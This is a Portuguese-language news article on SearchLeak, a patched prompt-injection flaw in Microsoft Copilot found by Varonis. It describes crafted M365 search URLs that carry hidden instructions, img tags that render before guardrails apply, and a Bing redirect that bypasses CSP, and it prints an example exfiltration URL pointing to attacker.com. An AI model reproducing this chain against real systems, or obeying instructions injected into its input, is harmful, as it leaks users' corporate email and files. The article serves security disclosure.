Cyera busca avaliação de US$ 12 bilhões com múltiplo de 80 vezes a receita
Empresa de segurança de dados Cyera negocia rodada de US$ 300 milhões com a Evolution Equity Partners, atingindo múltiplo de 80 vezes sua receita recorrente.
Brecha SearchLeak expõe dados corporativos no Microsoft Copilot
Pesquisadores revelam a SearchLeak, uma vulnerabilidade no Microsoft Copilot que permitia roubo de dados via injeção de parâmetros e bypass de segurança.
A equipe de pesquisa de segurança da empresa Varonis identificou uma falha crítica de segurança no Microsoft Copilot, batizada de SearchLeak. A vulnerabilidade de injeção de prompt por parâmetro permitia que cibercriminosos exfiltrassem dados confidenciais diretamente de ambientes corporativos do Microsoft 365. O ataque explorava um intervalo temporal no processamento de respostas do assistente de inteligência artificial para contornar proteções nativas e extrair informações como e-mails, convites de reuniões e arquivos armazenados, sem que a vítima precisasse digitar uma única linha de texto. A Microsoft corrigiu os pontos vulneráveis explorados pelo ataque na última terça-feira.
Como funciona o ataque
O vetor inicial da vulnerabilidade SearchLeak baseia-se em uma técnica conhecida como Parameter-to-Prompt Injection (Injeção de Parâmetro para Prompt). Para iniciar a exploração, um agente malicioso enviava à vítima um e-mail contendo uma URL com uma sintaxe específica, apontando para o domínio oficial da gigante de tecnologia: https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. O parâmetro final da URL, representado pela letra 'q', continha instruções maliciosas codificadas que o Copilot interpretava e executava imediatamente, sob o contexto e as permissões de acesso do usuário que clicou no link.
De acordo com os analistas da Varonis, a funcionalidade de pesquisa integrada ao ecossistema do Microsoft 365 é exatamente o que os atacantes necessitam para obter sucesso. No cenário do SearchLeak, mesmo um usuário com privilégios limitados dentro da infraestrutura corporativa é suficiente para causar um vazamento massivo, uma vez que ele possui acesso legítimo a informações sensíveis do seu próprio escopo de trabalho. Ao clicar na URL preparada pelo invasor, o navegador do usuário direciona a requisição ao Copilot, que prontamente obedece à instrução maliciosa embutida no parâmetro de busca.
A exfiltração silenciosa
O processo de roubo de dados ocorre de forma totalmente transparente e silenciosa para a vítima. Os pesquisadores da Varonis detalharam que o atacante formula uma instrução que ordena ao Copilot realizar uma varredura nas mensagens de e-mail do usuário no Microsoft 365, extrair os títulos dessas mensagens e embutir essas informações diretamente em uma URL de imagem (tag <img>). A vítima não interage com o chat da inteligência artificial; ela apenas clica no link recebido e o assistente executa o restante das etapas automaticamente no navegador de destino.
Normalmente, sistemas baseados em grandes modelos de linguagem (LLMs) como o Copilot possuem mecanismos de segurança que interceptam respostas e formatam conteúdos potencialmente perigosos dentro de blocos de código isolados, utilizando a tag <code> do HTML para neutralizar a execução de scripts e requisições externas. No entanto, a equipe de engenharia da Varonis descobriu uma falha estrutural no fluxo de renderização do assistente da Microsoft: essas barreiras de proteção ('guardrails') só eram ativadas após a conclusão da fase de 'pensamento' e geração da resposta completa da IA.
A brecha no DOM
Antes que o processamento completo termine e os blocos de proteção <code> sejam aplicados, o Copilot gera sua resposta em tempo real usando HTML puro. Esse código em estado bruto é renderizado temporariamente no Document Object Model (DOM) do navegador do usuário enquanto a resposta é transmitida por streaming. É justamente nessa janela temporal que o SearchLeak atua de forma precisa, explorando a própria natureza de renderização das páginas web modernas.
O fluxo exato do ataque foi documentado pelos pesquisadores da Varonis em uma sequência de quatro etapas principais:
- O Copilot inicia a transmissão em tempo real da sua resposta gerada, que inclui uma tag HTML de imagem (
<img>) contendo os dados roubados no atributo de origem. - O navegador da vítima detecta a tag
<img>no DOM, renderiza o elemento imediatamente e dispara de forma assíncrona uma requisição HTTP para o endereço especificado no atributosrc. - O Copilot finaliza a geração do texto da resposta.
- Os mecanismos de proteção da Microsoft finalmente entram em ação e envolvem toda a resposta na tag protetora
<code>.
Nesse momento, contudo, a ação de bloqueio ocorre tarde demais. A requisição HTTP contendo os dados corporativos extraídos já deixou o navegador do usuário e foi enviada para a rede pública, consolidando o vazamento de dados decorrente do SearchLeak.
O desvio com Bing
Após conseguir fazer com que o navegador da vítima disparasse uma requisição HTTP a partir de uma imagem, os pesquisadores enfrentaram um segundo obstáculo de segurança: a Content Security Policy (CSP, ou Política de Segurança de Conteúdo) do Copilot. O assistente de inteligência artificial da Microsoft possui restrições severas que o impedem de enviar requisições de imagem para a maioria dos domínios externos na internet, bloqueando conexões diretas para servidores sob controle de cibercriminosos.
Para contornar essa restrição da CSP, a cadeia de exploração do SearchLeak utilizou o mecanismo de busca Bing como uma espécie de trampolim. Como o Bing faz parte do ecossistema de serviços da Microsoft, ele está explicitamente listado como um domínio confiável e permitido na política de segurança do Copilot para o envio de tais requisições. Os pesquisadores da Varonis estruturaram a URL maliciosa para enviar a requisição de imagem ao serviço de busca reversa de imagens do Bing, que por sua vez redirecionava os parâmetros para o servidor do atacante.
A estrutura de redirecionamento utilizada na prova de conceito do ataque possuía o seguinte formato:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.pngCom essa estrutura, a requisição trafegava de forma legítima pelos filtros do Copilot, alcançava os servidores do Bing e terminava no domínio controlado pelo invasor (attacker.com), levando consigo as informações roubadas (representadas por STOLEN_DATA) sem levantar alertas de segurança.
O impacto nas empresas
A gravidade da vulnerabilidade SearchLeak reside no fato de ela mirar especificamente as assinaturas corporativas do ecossistema de nuvem da Microsoft, onde residem os dados operacionais mais críticos de companhias globalmente. Em termos de amplitude de danos, a falha permitia a exposição de qualquer documento indexado ao qual o colaborador alvo tivesse acesso de leitura dentro da organização.
"Como o SearchLeak visa o nível Enterprise da Microsoft, o raio de alcance não se limita a dados pessoais — ele é capaz de trazer à tona qualquer coisa que o usuário tenha acesso dentro da organização, incluindo e-mails, convites de reuniões e notas. Documentos do SharePoint, arquivos do OneDrive e outros conteúdos corporativos indexados. Dependendo de como o M365 está conectado ao ambiente, o raio de alcance pode se estender ainda mais."
Essa análise dos pesquisadores da Varonis destaca como a integração profunda promovida pelo Microsoft 365 pode atuar como um amplificador de riscos cibernéticos. Em ambientes corporativos complexos, um único clique em um link fraudulento por parte de um executivo ou administrador de sistemas poderia resultar no vazamento de relatórios financeiros confidenciais, segredos industriais ou chaves de acesso armazenadas em repositórios internos do SharePoint e OneDrive.
Perspectivas da segurança
Embora a Microsoft tenha agido para corrigir as brechas exploradas pelo SearchLeak na última terça-feira, o incidente reacende o debate técnico sobre a viabilidade de proteger sistemas baseados em inteligência artificial contra ataques de injeção de prompt. Especialistas apontam que, diferentemente do desenvolvimento de software tradicional, onde a separação entre instruções de código e dados do usuário é bem definida, os modelos de linguagem em nuvem processam instruções e dados no mesmo canal de texto.
Até o momento, não existem métodos definitivos na indústria de segurança cibernética para solucionar a causa raiz das vulnerabilidades de injeção de prompt em assistentes virtuais como o Copilot. Com a ausência de uma correção estrutural definitiva para esse tipo de problema no ecossistema do Microsoft 365, analistas preveem que cibercriminosos continuarão descobrindo formas inéditas de contornar as novas barreiras de proteção implementadas pelas empresas de tecnologia, mantendo o setor em um ciclo constante de correção e novos desvios.
#microsoft-copilot#varonis#vulnerabilidade#searchleak#microsoft-365
Artigos Relacionados
Amazon é processada por reconhecimento facial em câmeras Ring
Ação coletiva movida nos EUA acusa Amazon de violar privacidade ao usar reconhecimento facial em câmeras de segurança Ring sem o consentimento de pedestres.
Ataque FROST monitora atividade de SSD usando JavaScript para espionar usuários
Nova técnica de canal lateral FROST usa JavaScript e IA para analisar latência de SSDs e rastrear comportamento. Conheça o funcionamento e mitigações.